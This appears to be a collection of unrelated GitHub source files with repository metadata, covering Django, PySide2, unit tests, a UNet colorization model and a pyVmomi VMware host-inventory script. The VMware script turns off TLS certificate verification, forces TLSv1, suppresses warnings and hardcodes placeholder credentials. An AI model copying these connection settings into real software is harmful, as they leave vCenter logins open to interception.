a1e75d8649dc7b3cba5ad57ba9be33908ab46e99 | b5e3b4b8e2c70e06e3b19bcd86789b83028da78f | /django_project/blog/migrations/0010_auto_20190620_2016.py | bba9cbb55a28a13c6ceef32ab6ddce4d10faf094 | [] | no_license | feridbedelov/Django_Project_Blog_Aurora | 334593d2d523f38e7c472b6e8439cd19f777ec6a | 130f3db455590333c45d40c042722f5908e7bb32 | refs/heads/master | 2020-07-31T15:47:39.431799 | 2019-09-24T17:41:33 | 2019-09-24T17:41:33 | 210,662,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | # Generated by Django 2.2.1 on 2019-06-20 16:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0009_auto_20190620_2016'),
]
operations = [
migrations.AlterField(
model_name='post',
name='rating',
field=models.FloatField(default=5.5),
),
]
| [
"User@DESKTOP-K24KG53"
] | User@DESKTOP-K24KG53 |
c73a3c6348b392d2b4b0ff13896dd6ddb2cbc87b | 3d7435ffae4cccde624deed9bd5edce7cd020284 | /Python_Project/venv/user_input_file_ReadnWrt.py | 78ab639472a5933a8f94bdd11b0e1a13b9e24e35 | [] | no_license | Nidhibaghel88/test-teamcity | 066559df727afc5e47277f996959fa11b7488393 | 78c69bf5a1391e3dc21b30855372e9290afd91a2 | refs/heads/master | 2020-04-08T04:23:00.492155 | 2018-11-25T19:12:55 | 2018-11-25T19:12:55 | 159,013,934 | 0 | 0 | null | 2018-11-25T18:16:43 | 2018-11-25T08:55:55 | Python | UTF-8 | Python | false | false | 1,053 | py | def file_overwrite(filename, n):
with open(filename, 'r+') as f:
content = f.read()
print(content)
while True:
feedback = input("Type 'y' to overwrite the file or 'n' to exit: ")
if feedback.lower() == 'y':
# move the file pointer back to the start and then truncate the file
f.seek(0)
f.truncate()
break
elif feedback.lower() == 'n':
# return instantly, another advantage of using a function
return
else:
print("Please enter either 'y' or 'n'.")
print('Write {} lines to the file.'.format(n))
lines = []
for line_num in range(1, n + 1):
line = input('line {}: '.format(line_num))
lines.append(line)
f.write('\n'.join(lines))
with open(filename, 'r+') as f:
content = f.read()
print(content)
file_overwrite('C:/Users/nidhi.baghel/OneDrive - Shell/Documents/Python/venv/sample.txt', 3)
| [
"Nidhi.Baghel@shell.com"
] | Nidhi.Baghel@shell.com |
8fe3e2ec9bb3eb665413698d3bb7206359767fd8 | c9bc6a21768950ef010c52cc55c3e784af509e7a | /gview3.py | b5a59a0d40c82ed8b140bd14d46a4a016b6f6488 | [] | no_license | aamirglb/PythonTest | f97b93f76f238dc507031cd1cfdbdba4dffd88ee | fec366ed88d627a60df8c4b376a4e9cced23433f | refs/heads/master | 2020-05-07T18:30:36.196372 | 2019-11-05T04:23:29 | 2019-11-05T04:23:29 | 180,769,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,754 | py | from PySide2.QtWidgets import (QApplication, QGraphicsView, QGraphicsScene, QGraphicsItem, QGraphicsRectItem,
QWidget, QGraphicsSimpleTextItem, QGraphicsEllipseItem, QGraphicsPolygonItem, QGraphicsItem,
QMenu, QAction)
from PySide2.QtGui import (QPen, QBrush, QPolygonF, QPainter, QFont, )
from PySide2.QtCore import (Qt, QRectF, QPoint, QPointF, QTimer )
import sys
class SlotItem(QGraphicsItem):
def __init__(self, id, parent=None):
super(SlotItem, self).__init__(parent)
self.width = 100
self.height = 70
self.id = id
def boundingRect(self):
return QRectF(0, 0, self.width, self.height)
def paint(self, painter, option, widget):
rect = self.boundingRect()
painter.drawRect(rect)
font = painter.font()
font.setPixelSize(12)
font.setWeight(QFont.Bold)
painter.setFont(font)
painter.drawText((self.width/2)-4, 15, f'{self.id}')
def contextMenuEvent(self, event):
self.menu = QMenu()
self.showModeAction = QAction(f'Slot {self.id}')
self.menu.addAction(self.showModeAction)
self.menu.exec_(event.screenPos())
class BracketItem(QGraphicsItem):
def __init__(self, id):
super(BracketItem, self).__init__()
self.zoomFactor = 1
self.rootSlot = SlotItem(1, self)
self.leftChild = SlotItem(2, self)
self.rightChild = SlotItem(3, self)
self.rootSlot.setPos(120, 20)
self.leftChild.setPos(20, 140)
self.rightChild.setPos(220, 140)
self.scaleFactor = 1
def boundingRect(self):
return QRectF(0, 0, 340, 230)
def paint(self, painter, option, widget):
# self.scaleFactor -= 0.1
# painter.scale(self.scaleFactor, self.scaleFactor)
rect = self.boundingRect()
painter.drawRect(rect)
painter.drawLine(170, 90, 70, 140)
painter.drawLine(170, 90, 270, 140)
def contextMenuEvent(self, event):
self.menu = QMenu()
self.showModeAction = QAction('Bracket')
self.menu.addAction(self.showModeAction)
self.menu.exec_(event.screenPos())
def timerHandler():
bracket1.scaleFactor -= 0.1
print(f'scaleFactor: {bracket1.scaleFactor}')
bracket1.setScale(bracket1.scaleFactor)
if bracket1.scaleFactor < 0.5:
timer.stop()
if __name__ == '__main__':
app = QApplication(sys.argv)
scene = QGraphicsScene(QRectF(-50, -50, 500, 400))
# scene.addItem(QGraphicsRectItem(scene.sceneRect()))
bracket1 = BracketItem(1)
scene.addItem(bracket1)
timer = QTimer()
timer.setInterval(7000)
timer.timeout.connect(timerHandler)
view = QGraphicsView()
view.setScene(scene)
view.show()
timer.start()
sys.exit(app.exec_()) | [
"aamirglb@users.noreply.github.com"
] | aamirglb@users.noreply.github.com |
5070fa0e732ec8a3253007ddb99b24015204161d | b8b8b36049217e4da9c3693beeeae74a0d97f875 | /min-cost-climbing-stairs.py | 394b7afd0ee41d0781ad03a6437a1237e043912a | [] | no_license | xichagui/algorithm | e9d94a8ac06c6b5d791ed540142fc22f83ef41f2 | 5d4114bc9d77f80da26374168ab289dfe22099f4 | refs/heads/master | 2021-06-20T03:20:55.637823 | 2021-01-13T17:57:05 | 2021-01-13T17:57:05 | 66,262,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | class Solution:
def minCostClimbingStairs(self, cost: List[int]) -> int:
for i in range(2, len(cost)):
cost[i] += min(cost[i - 1], cost[i - 2])
return min(cost[-1], cost[-2])
| [
"xichagui@gmail.com"
] | xichagui@gmail.com |
395d19943263cbfba1bdb00171a56181ec34b3cb | ec6c7bb9b880b893b8a5676d62f3797e5e709968 | /tests.py | c01f3164a4da5ae079379555335b5af943e57a99 | [] | no_license | jeffmay/maize | a1e18dcf58bf9bd3d7639858e605865efa44ed41 | 7dd2a114a56085c556cb50542f844331ac1fa116 | refs/heads/master | 2021-01-23T11:49:24.229054 | 2012-06-15T12:09:41 | 2012-06-15T12:09:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,803 | py | import unittest
from vector import *
class VectorTests(unittest.TestCase):
def test_init(self):
self.assertEqual(vector(), tuple())
self.assertEqual(vector(()), tuple())
self.assertEqual(vector([]), tuple())
self.assertEqual(vector((1,)), (1,))
self.assertEqual(vector([1]), (1,))
def test_v(self):
self.assertEqual(v(), vector())
self.assertEqual(v(1), vector([1]))
self.assertEqual(v(1,2), vector([1,2]))
with self.assertRaises(TypeError):
v(x=1)
with self.assertRaises(TypeError):
v(1, z=3)
def test_eq(self):
self.assertEqual(vector([1,2]), vector([1,2]))
self.assertEqual(vector([1,2]), (1,2))
self.assertTrue(vector([1,2]) == (1,2))
self.assertFalse(vector([1,2]) == [1,2])
def test_req(self):
self.assertEqual((1,2), vector([1,2]))
self.assertTrue((1,2) == vector([1,2]))
self.assertFalse([1,2] == vector([1,2]))
def test_pos(self):
self.assertEqual(+vector([1,2]), vector([1,2]))
def test_neg(self):
self.assertEqual(-vector([1,2]), vector([-1,-2]))
def test_add(self):
self.assertEqual(vector([1,2]) + vector([3,4]), (4,6))
self.assertEqual(vector([1,2,3]) + vector([4,5,6]), (5,7,9))
self.assertEqual(vector([1,0]) + (0,-1), (1, -1))
with self.assertRaises(TypeError):
vector([0,-1]) + 1
def test_radd(self):
self.assertEqual((1,2) + vector([3,4]), vector([4, 6]))
self.assertEqual([1,2,3] + vector([4,5,6]), vector([5,7,9]))
with self.assertRaises(TypeError):
1 + vector([0,-1])
def test_iadd(self):
x = vector([1,2])
x += vector([3,4])
self.assertEqual(x, vector([4,6]))
x = vector([1,2])
x += (3,4)
self.assertEqual(x, vector([4,6]))
with self.assertRaises(TypeError):
x = vector([0,-1])
x += 1
def test_sub(self):
self.assertEqual(vector([1,2]) - vector([3,4]), (-2, -2))
self.assertEqual(vector([4,5,6]) - vector([1,2,3]), (3, 3, 3))
self.assertEqual(vector([1,0]) - (0,-1), (1, 1))
def test_rsub(self):
self.assertEqual((1,2) - vector([3,4]), vector([-2, -2]))
self.assertEqual([4,5,6] - vector([1,2,3]), vector([3, 3, 3]))
with self.assertRaises(TypeError):
1 - vector([0,-1])
def test_isub(self):
x = vector([1,2])
x -= vector([3,4])
self.assertEqual(x, vector([-2, -2]))
x = vector([4,5,6])
x -= (1,2,3)
self.assertEqual(x, (3, 3, 3))
with self.assertRaises(TypeError):
x = vector([0,-1])
x -= 1
def test_mul(self):
self.assertEqual(vector([1,2]) * 2, vector([2, 4]))
self.assertEqual(vector([4,5,6]) * 2, vector([8, 10, 12]))
self.assertEqual(vector([1,2]) * (3,4), 1*3 + 2*4)
with self.assertRaises(ValueError):
vector([1,2]) * vector([3,4,5])
with self.assertRaises(ValueError):
vector([1,2,3]) * vector([4,5])
def test_rmul(self):
self.assertEqual(2 * vector([1,2]), vector([2, 4]))
self.assertEqual(2 * vector([4,5,6]), vector([8, 10, 12]))
self.assertEqual((3,4) * vector([1,2]), 3*1 + 4*2)
with self.assertRaises(ValueError):
vector([1,2]) * vector([3,4,5])
with self.assertRaises(ValueError):
vector([1,2,3]) * vector([4,5])
def test_repr(self):
self.assertEqual(repr(vector()), "v()")
self.assertEqual(repr(vector([1, 0, -1])), "v(1, 0, -1)")
def test_str(self):
self.assertEqual(str(vector()), "<>")
self.assertEqual(str(vector([1, 0, -1])), "<1, 0, -1>")
| [
"viralidealogue@gmail.com"
] | viralidealogue@gmail.com |
cf8025a4a33af69722465da60102609dcbda82a2 | 73c7aceeccc9b4c095dd8e23d376b6449571ad56 | /banaublog/asgi.py | 4078b26f12e23f6382d805a9098c65c9185086b2 | [] | no_license | scottstot154/Banau-blog | 0efbbebae5ca7ddfbcba7d359ced17b5cad426bb | bcbe0e27dde4589699eacf6ec5fa81ca484f0e4b | refs/heads/main | 2023-07-13T20:25:14.966037 | 2021-08-24T21:11:16 | 2021-08-24T21:11:16 | 399,599,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
ASGI config for banaublog project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'banaublog.settings')
application = get_asgi_application()
| [
"noreply@github.com"
] | noreply@github.com |
8af8b1154126237b12e676c20db0981a5f9e3d8e | 8a14a7724d00f1eb7791e53f8446e99ecc975605 | /scripts/extract_features.py | 95649f83351e38ae3501cff705bf80339edd1315 | [
"Apache-2.0"
] | permissive | aschn/picolo | 3fa7b26d079fc9687de9c3e1e34cae774bcf8416 | 1f8f50e0709fdaef31bc38045ef9fd0c46aae2b5 | refs/heads/master | 2020-04-30T01:37:36.587287 | 2013-07-19T00:32:05 | 2013-07-19T00:32:05 | 9,307,233 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,229 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author Anna Schneider
@version 0.1
@brief Typical script using picolo to extract features from point particles
"""
import picolo
from shapes import shape_factory_from_values
import argparse
import os.path as path
import time
import csv
# start timer
start = time.time()
# parse command-line arguments
brief = 'Typical script using picolo to extract features from point particles.'
parser = argparse.ArgumentParser(description=brief)
parser.add_argument('filename', type=str, help='path to xy coord file')
parser.add_argument('shape', type=str, help='type of features to extract',
choices=['UnitCell', 'Fourier', 'Zernike'])
parser.add_argument('dist', type=float, help='distance cutoff to neighbors')
parser.add_argument('--train', action='store_true',
help='include flag to only get features for prespecified training rows')
args = parser.parse_args()
# set up file paths
rootname, ext = path.splitext(args.filename)
dirname = path.dirname(args.filename)
# set up matcher
matcher = picolo.Matcher(args.filename, delim=' ', name=rootname,
trainingcol=2)
# create and add default shape of correct type
shape = shape_factory_from_values(args.shape,
optdata={'neighbor_dist': args.dist,
'max_dist': args.dist})
matcher.shapes.add('test', shape)
# get ndarray of features and particle ids by comparing to 'test' shape
features = matcher.feature_matrix('test')
# open csv writer
outfile = '%s_%s_features.dat' % (rootname, args.shape)
writer = csv.writer(open(outfile, 'w'), delimiter=' ')
# write header
writer.writerow(['id'] + shape.get_components())
# loop over particle ids
if args.train:
inds = matcher.training_ids
else:
inds = range(matcher.config.N)
for ip in inds:
# only write features for particles with valid shapes
if matcher.get_features('test', ip).get('is_valid'):
# write row of features
writer.writerow([ip] + ['%0.4f' % x for x in features[ip]])
# end timer
end = time.time()
print 'Done with %s ... took %d seconds.' % (rootname, end-start)
| [
"annarschneider@gmail.com"
] | annarschneider@gmail.com |
1eadf13b44ed3ecced195ac1f6974c5866be1f8b | 37efda4646f478b66674e384e1bc139e7874d972 | /practice/RaodtoMillionaire.py | 7677b54444573abaec9ffa4c8c2fa22f69a24b2b | [] | no_license | siberian122/kyoupuro | 02c1c40f7c09ff0c07a1d50b727f860ad269d8b1 | 8bf5e5b354d82f44f54c80f1fc014c9519de3ca4 | refs/heads/master | 2023-04-04T02:45:29.445107 | 2021-04-20T07:37:47 | 2021-04-20T07:37:47 | 299,248,378 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | n = int(input())
a = list(map(int, input().split()))
b = []
for i in range(n-1):
num = a[i]-a[i+1]
b.append(num)
now = 1000
stock = 0
for i in range(n-1):
if b[i] > 0: # 売る
now += stock*a[i]
stock = 0
elif now > 0 and b[i] < 0: # 買う
stock += now//a[i]
now = now % a[i]
#print(now, stock)
now += a[-1]*stock
print(now)
| [
"siberian1000@gmail.com"
] | siberian1000@gmail.com |
d4a6b27bf60dc1ceb584a5edc8a74f007225d63e | 6bac66f8ac3d41364a4400c038249cfbf7a1475f | /Code/model_mobilenetv2_unet.py | c94142b86d6b49134b4d7de9f04297d2cfe81f0b | [] | no_license | Tejaswi-dev/Image_Colorization | 05aeb846ab15d3785437d1c69108890d06c73324 | 3721b29a3e39023634a3dcc6eaf2aae7df4b2913 | refs/heads/master | 2022-05-24T13:30:58.408217 | 2020-04-28T15:43:40 | 2020-04-28T15:43:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,330 | py | # %% --------------------------------------- Imports -------------------------------------------------------------------
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from tensorflow.keras.layers import *
from tensorflow.keras.models import Model
from tensorflow.keras.applications.vgg16 import *
from sklearn.model_selection import train_test_split
import math
from tensorflow.python.keras.utils import losses_utils
import segmentation_models as sm
sm.set_framework('tf.keras')
print(sm.__version__)
# %% --------------------------------------- Set-Up --------------------------------------------------------------------
tf.config.experimental.list_physical_devices('GPU')
tf.random.set_seed(42)
np.random.seed(42)
# %% ----------------------------------- Hyper Parameters and Constants ------------------------------------------------
IMG_SIZE = [224, 224]
N_CHANNELS = 3
N_CLASSES = 169
DIR_BASE = '/home/ubuntu/capstone/train_test/'
PRED_DIR = '/home/ubuntu/capstone//prediction/'
VALID_SIZE = 0.1765
BATCH_SIZE = 8
NUM_EPOCHS = 10
# %% -------------------------------------- Data Prep ------------------------------------------------------------------
x_train = np.load(file=DIR_BASE + "x_train.npy", allow_pickle=True)
y_train = np.load(file=DIR_BASE + "y_train.npy", allow_pickle=True)
x_test = np.load(file=DIR_BASE + "x_test.npy", allow_pickle=True)
y_test = np.load(file=DIR_BASE + "y_test.npy", allow_pickle=True)
x_true = np.load(file=PRED_DIR + "x_true.npy", allow_pickle=True)
x_train, x_valid, y_train, y_valid = train_test_split(x_train, y_train, test_size=VALID_SIZE)
class CustomDataGenerator(tf.keras.utils.Sequence):
def __init__(self, x_set, y_set, batch_size, num_classes=N_CLASSES):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
self.n_classes = num_classes
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = tf.keras.utils.to_categorical(y=batch_y,
num_classes=N_CLASSES)
return batch_x, batch_y
training_generator = CustomDataGenerator(x_train, y_train, batch_size=BATCH_SIZE)
validation_generator = CustomDataGenerator(x_valid, y_valid, batch_size=BATCH_SIZE)
testing_generator = CustomDataGenerator(x_test, y_test, batch_size=BATCH_SIZE)
# %% -------------------------------------- UNet Model -----------------------------------------------------------------
unet_model = sm.Unet(backbone_name='mobilenetv2', encoder_weights='imagenet',
classes=169, input_shape=(224, 224, 3), activation='softmax')
unet_model.summary()
# %% -------------------------------------- Training Prep ----------------------------------------------------------
def dice_loss(y_true, y_pred, eps=1e-6, spatial_axes=[1, 2], from_logits=False):
num_classes = y_pred.shape[-1]
# Transform logits in probabilities, and one-hot the ground-truth:
# Compute Dice numerator and denominator:
num_perclass = 2 * tf.math.reduce_sum(y_pred * y_true, axis=spatial_axes)
den_perclass = tf.math.reduce_sum(y_pred + y_true, axis=spatial_axes)
# Compute Dice and average over batch and classes:
dice = tf.math.reduce_mean((num_perclass + eps) / (den_perclass + eps))
return 1 - dice
class DiceLoss(tf.keras.losses.Loss):
def __init__(self, eps=1e-6, spatial_axes=[1, 2], from_logits=False, name='loss'):
super(DiceLoss, self).__init__(reduction=losses_utils.ReductionV2.AUTO, name=name)
self.eps = eps
self.spatial_axes = spatial_axes
self.from_logits = from_logits
def call(self, y_true, y_pred, sample_weight=None):
return dice_loss(y_true, y_pred, eps=self.eps,
spatial_axes=self.spatial_axes, from_logits=self.from_logits)
accuracy = tf.metrics.Accuracy(name='acc')
meanIoU = tf.metrics.MeanIoU(num_classes=N_CLASSES, name='mIoU')
loss_c = tf.keras.losses.CategoricalCrossentropy()
loss_d = DiceLoss()
optimizer = tf.keras.optimizers.Adam()
# %% -------------------------------------- Training -------------------------------------------------------------------
unet_model.compile(optimizer=optimizer, loss=loss_d, metrics=[meanIoU])
history = unet_model.fit(x=training_generator,
validation_data=validation_generator,
epochs=NUM_EPOCHS)
# %% -------------------------------------- Testing --------------------------------------------------------------------
history_test = unet_model.evaluate(x=testing_generator)
print(history_test)
# %% -------------------------------------- Prediction -----------------------------------------------------------------
x_true = np.load(file=PRED_DIR + "x_true.npy", allow_pickle=True)
def predict(images, model):
x_true = images
y_pred = np.argmax(model.predict(x_true), axis=-1)
return x_true, y_pred
x_pred, y_pred = predict(x_true, unet_model)
np.save(PRED_DIR + "x_pred.npy", x_true)
np.save(PRED_DIR + "y_pred.npy", y_pred)
| [
"kanchan.ghimire92@gmail.com"
] | kanchan.ghimire92@gmail.com |
195fc4a1ecc35a5591a35a938af3d1b72bb25692 | a8597579e18b54d2a98c89c10326d3287c2a4603 | /connect_scratch_hosts.py | 85009d6764ca93cb1464f89db63b43e83db7c01c | [] | no_license | dsmithintx/vmware_host_info | 3744a7fef17b6f4093351b169eb82cc3f56343e0 | 0a0c0704d7ecd79074515e2280b156a75f84ebab | refs/heads/main | 2023-03-03T23:05:19.526021 | 2021-02-12T17:22:36 | 2021-02-12T17:22:36 | 338,383,084 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,177 | py | from pyVim.connect import SmartConnect, Disconnect, GetSi, SmartConnectNoSSL
from pyVmomi import vmodl
from pyVmomi import vim
import atexit
import requests
import ssl
# Disabling urllib3 ssl warnings
requests.packages.urllib3.disable_warnings()
# Disabling SSL certificate verification
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_NONE
user = "user_name"
password = "passwd"
vcenter = "vcenter_name"
port = 443
# connect to vCenter
try:
si = SmartConnect(host=vcenter, user=user, pwd=password, port=port)
print('Good to go')
except:
si = SmartConnectNoSSL(host=vcenter, user=user, pwd=password, port=port)
print('Using NoSSL Connection...')
# Disconnect when completed
atexit.register(Disconnect, si)
content = si.RetrieveContent()
##### View Types as a dictionary i.e. Get-View types, HostSystem, VirtualMachine, etc.
vim_types = {'datacenter': [vim.Datacenter],
'dvs_name': [vim.dvs.VmwareDistributedVirtualSwitch],
'datastore_name': [vim.Datastore],
'resourcepool': [vim.ResourcePool],
'host': [vim.HostSystem],
'cluster': [vim.ClusterComputeResource],
'vm': [vim.VirtualMachine],
'dportgroup': [vim.DistributedVirtualPortgroup],
'portgroup': [vim.Network]}
##### View Types i.e. Get-View types, HostSystem, VirtualMachine, etc.
Datacenter = [vim.Datacenter] # Datacenter
VirtualMachine = [vim.VirtualMachine] # VirtualMachine
HostSystem = [vim.HostSystem] # HostSystem
# ClusterComputeResource [vim.ClusterComputeResource]
ClusterComputeResource = [vim.ComputeResource]
Datastore = [vim.Datastore] # Datastore
Network = [vim.Network] # Network
# DistributedVirtualPortgroup
DvPG = [vim.DistributedVirtualPortgroup]
Folder = [vim.Folder] # Folder
name = 'esx_host_name'
# Host objects
print("Collecting host objects...")
host_systems = content.viewManager.CreateContainerView(
content.rootFolder, HostSystem, True) # Get-View -ViewType HostSystem
hostView = host_systems.view
print("Stop")
def print_host_info(host):
config = host.config
hardware = host.hardware
runtime = host.runtime
summary = host.summary
for i in summary.hardware.otherIdentifyingInfo:
if isinstance(i, vim.host.SystemIdentificationInfo):
serial_number = i.identifierValue
# summary.config.name
print(f"Name : {host.name}")
print(f"Manufacture : {hardware.systemInfo.vendor}")
print(f"Model : {hardware.systemInfo.model}")
print(f"Serial Number : {serial_number}")
print(f"uuid : {hardware.systemInfo.uuid}")
print(f"Cpu Sockets : {hardware.cpuInfo.numCpuPackages}")
print(f"Number of Cores : {hardware.cpuInfo.numCpuCores}")
print(f"Mem Size : {hardware.memorySize}")
print(f"Bios Version : {hardware.biosInfo.biosVersion}")
print(f"Bios Release : {hardware.biosInfo.releaseDate}")
print(f"ESXi Version : {summary.config.product.version}")
print(f"ESXi Build : {summary.config.product.build}")
print(f"ESXi API Version : {summary.config.product.apiVersion}")
print(f"Product Full Name : {summary.config.product.fullName}")
print(f"License Product Name : {summary.config.product.licenseProductName}")
print(f"License Product Version : {summary.config.product.licenseProductVersion}")
print(f"Product Vendor : {summary.config.product.vendor}")
print(f"Boot Time : {summary.runtime.bootTime}")
print(f"Overall Status : {summary.overallStatus}")
print(f"Connection State : {runtime.connectionState}")
print(f"Maintenance Mode : {runtime.inMaintenanceMode}")
print(f"Power State : {runtime.powerState}")
print(f"Standby Mode : {runtime.standbyMode}")
print(f"vMotion IP : {config.vmotion.ipConfig.ipAddress}")
print(f"vMotion SubnetMask : {config.vmotion.ipConfig.subnetMask}")
## Find host by Name
for host in host_systems.view:
if name:
if host.name == name:
obj = host
print_host_info(host)
print(host.name)
break
else:
obj = host
break
print("End")
| [
"donnal.smithtx@gmail.com"
] | donnal.smithtx@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.